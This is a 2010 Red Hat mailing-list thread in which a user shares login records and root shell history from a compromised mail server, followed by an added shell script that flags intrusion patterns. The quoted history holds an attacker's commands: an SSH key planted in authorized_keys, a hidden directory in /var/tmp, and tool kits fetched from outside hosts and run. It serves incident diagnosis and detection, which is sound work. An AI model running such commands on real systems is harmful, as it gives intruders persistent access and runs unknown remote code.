Yes, you were hacked. Hope you have backups because you should reinstall.

Sent from my iPhone

On Jan 28, 2010, at 0:11, "Joy Methew" <ml4joy@xxxxxxxxx> wrote:

> Hello all,
> I am using RHEL 5.3 as my mail server with a real IP. I configure my
> system mostly remotely. The last login time of my system was 27 Jan
> from this IP: 118.129.153.43.
> Then I tried to log in on 28 Jan in the morning, and I couldn't get
> authentication as root with my last password.
> Then I rebooted the system and reset my password.
> I logged in as root, then I ran the "last" command. I am sending the
> first 10 lines of the last command... I think someone hacked my system.
> I am also sending the history command output.
> Now I have removed the .ssh directory and /var/tmp/*.
>
> Please suggest what this is.
>
> Thanks
>
> last command output:
>
> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>
> What is 165.red-79........? This is not my IP.
>
> History Output
>
>   115  cat /proc/cpuinfo
>   116  mkdir .ssh
>   117  cd .ssh
>   118  echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>   119  cd /var/tmp
>   120  mkdir " "
>   121  cd " "
>   122  passwd
>   123  echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>   124  ps -x
>   125  cd /var/tmp
>   126  w
>   127  wget http://kok.ucoz.de/gosh.tgz
>   128  tar xvf gosh.tgz
>   129  cd gosh
>   130  chmod +x *
>   131  ./go.sh 121
>   132  w
>   133  ps -x
>   134  ps -aux
>   135  cd /var/tmp
>   136  cd " "
>   137  ls -a
>   138  wget http://helpbnc.myftp.org/danger/fld.tgz
>   139  tar xzvf fld.tgz
>   140  cd fld
>   141  chmod +x *
>   142  nano cyc.acc
>   143  nano cyc.acc.1
>   144  nano cyc.set
>   145  ./httpd
>   146  w
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
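
Added example, not part of the original thread: a small triage filter that tags the patterns visible in the quoted history (a key appended to authorized_keys, a whitespace-named directory, a password change, and downloads or executions inside a world-writable directory). The function names, tag names, rule set and sample input are assumptions constructed for illustration; the sample uses placeholder URLs and a placeholder key.

```shell
#!/bin/sh
# Added example: triage a root shell history for persistence and staging
# patterns. The rules are illustrative, not an exhaustive detector.

# flag_history: reads `history` output on stdin, prints "TAG<TAB>command".
flag_history() {
    awk '
    BEGIN { TMP = "^cd[ \t]+(/var/tmp|/tmp|/dev/shm)(/|$)" }
    {
        cmd = $0
        sub(/^[ \t]*[0-9]+[ \t]+/, "", cmd)          # strip the history index
    }
    # Absolute or home cd: recompute whether we are in a world-writable dir.
    # Relative cd (e.g. cd kit) leaves the state unchanged.
    cmd ~ /^cd([ \t]+~.*)?[ \t]*$/ || cmd ~ /^cd[ \t]+\// { staged = (cmd ~ TMP) }
    # Output redirected into an authorized_keys file (new login key).
    cmd ~ />[ \t]*[^ \t;]*authorized_keys/  { print "SSH_KEY_WRITE\t" cmd }
    # Directory whose name is only spaces or dots, easy to miss in ls output.
    cmd ~ /^(mkdir|cd)[ \t]+"[ .]+"[ \t]*$/ { print "HIDDEN_DIR\t" cmd }
    cmd ~ /^passwd([ \t]|$)/                { print "PASSWORD_CHANGE\t" cmd }
    staged && cmd ~ /^(wget|curl)[ \t]/     { print "DOWNLOAD_IN_TMP\t" cmd }
    staged && cmd ~ /^\.\/[^ \t]+/          { print "EXEC_FROM_TMP\t" cmd }
    '
}

# Constructed sample input (placeholder key and URLs, not real indicators).
sample_history() {
    cat <<'EOF'
  116  mkdir .ssh
  117  cd .ssh
  118  echo ssh-rsa PLACEHOLDERKEY label >> ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys
  119  cd /var/tmp
  120  mkdir " "
  121  cd " "
  122  passwd
  127  wget http://example.invalid/kit.tgz
  128  tar xvf kit.tgz
  129  cd kit
  131  ./go.sh 121
  132  cd /root
  133  wget http://example.invalid/notes.txt
EOF
}

sample_history | flag_history
```

A history file is under the control of whoever held the account, so a clean result proves nothing; hits are leads for the investigation before the reinstall recommended above.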